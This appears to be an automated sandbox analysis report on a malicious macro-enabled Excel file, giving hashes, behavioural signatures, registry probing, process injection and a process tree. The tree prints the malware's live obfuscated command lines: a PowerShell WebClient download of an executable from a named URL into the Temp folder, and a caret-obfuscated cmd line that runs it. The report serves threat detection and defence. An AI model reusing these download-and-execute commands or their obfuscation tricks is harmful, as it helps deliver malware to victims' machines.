Analysis
max time kernel: 109s
max time network: 141s
platform: windows10_x64
resource: win10v20210408
submitted: 05/08/2021, 18:27
Behavioral task: behavioral1
Sample: fileattached.xlsm
Resource: win7v20210410
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: fileattached.xlsm
Resource: win10v20210408
0 signatures, 0 seconds
General
Target: fileattached.xlsm
Size: 12KB
MD5: 2d827df1ee25674aac2060c37efa2fe7
SHA1: c3c6a82ee16f87ebacdd8be47018be38b6c98a27
SHA256: 436651743894169dc9cd4c7ef01734420a5ce2d6dcaf57825197e0c756feeee9
SHA512: 93258ac910bcad2633dfaa947edf88b3cfea5bb625b071e005fc7ba117e1307a77a6ddc5a8a7ab14a3cea646d8743dc60e5cdc0271ee8eb467faf2a06d739d66
Score: 10/10
Malware Config
Extracted
Language: ps1
Deobfuscated
URLs:
exe.dropper | http://iurl.vip/bij0o
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3832 | 3716 | cmd.exe | 67
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3896 | 3716 | powershell.exe | 67

Blocklisted process makes network request (2 IoCs)
flow | pid | Process
25 | 3896 | powershell.exe
27 | 3896 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoCs)
pid | Process
388 | zJAMC.exe

Uses the VBS compiler for execution (1 TTPs)

An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoCs)
pid | Process
3832 | cmd.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid | Process
3716 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid | Process
3980 | powershell.exe
3980 | powershell.exe
3896 | powershell.exe
3980 | powershell.exe
3896 | powershell.exe
3896 | powershell.exe
388 | zJAMC.exe
388 | zJAMC.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3980 | powershell.exe
Token: SeDebugPrivilege | 3896 | powershell.exe
Token: SeDebugPrivilege | 388 | zJAMC.exe

Suspicious use of SetWindowsHookEx (14 IoCs)
pid | Process
3716 | EXCEL.EXE (14 identical entries)

Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 3716 wrote to memory of 3832 | 3716 | EXCEL.EXE | 77
PID 3716 wrote to memory of 3832 | 3716 | EXCEL.EXE | 77
PID 3716 wrote to memory of 3896 | 3716 | EXCEL.EXE | 79
PID 3716 wrote to memory of 3896 | 3716 | EXCEL.EXE | 79
PID 3832 wrote to memory of 3980 | 3832 | cmd.exe | 81
PID 3832 wrote to memory of 3980 | 3832 | cmd.exe | 81
PID 3980 wrote to memory of 388 | 3980 | powershell.exe | 86
PID 3980 wrote to memory of 388 | 3980 | powershell.exe | 86
PID 3980 wrote to memory of 388 | 3980 | powershell.exe | 86
PID 388 wrote to memory of 2988 | 388 | zJAMC.exe | 87
PID 388 wrote to memory of 2988 | 388 | zJAMC.exe | 87
PID 388 wrote to memory of 2988 | 388 | zJAMC.exe | 87
Processes (process tree; indentation shows parent/child depth)

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\fileattached.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 3716

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\zJAMC.exe
    - Process spawned unexpected child process
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID: 3832

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\zJAMC.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3980

      C:\Users\Admin\AppData\Local\Temp\zJAMC.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 388

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Command line: "\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          PID: 2988

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/bij0o',$env:Temp+'\zJAMC.exe')
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3896